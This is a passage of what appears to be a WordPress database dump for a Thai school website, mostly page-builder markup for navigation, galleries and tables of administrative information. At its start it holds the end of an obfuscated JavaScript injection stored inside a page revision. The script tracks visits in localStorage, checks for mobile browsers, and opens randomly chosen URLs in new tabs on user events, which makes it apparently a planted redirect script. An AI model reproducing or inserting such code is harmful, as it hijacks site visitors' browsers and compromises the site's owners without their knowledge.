_0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วิสัยทัศน์/พันธกิจ/เป้าประสงค์','','inherit','closed','closed','','656-revision-v1','','','2024-08-07 17:23:14','2024-08-07 10:23:14','',656,'http://pakhaeng.ssk.in.th/?p=658',0,'revision','',0),
(659,1,'2024-08-07 17:24:15','2024-08-07 10:24:15','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 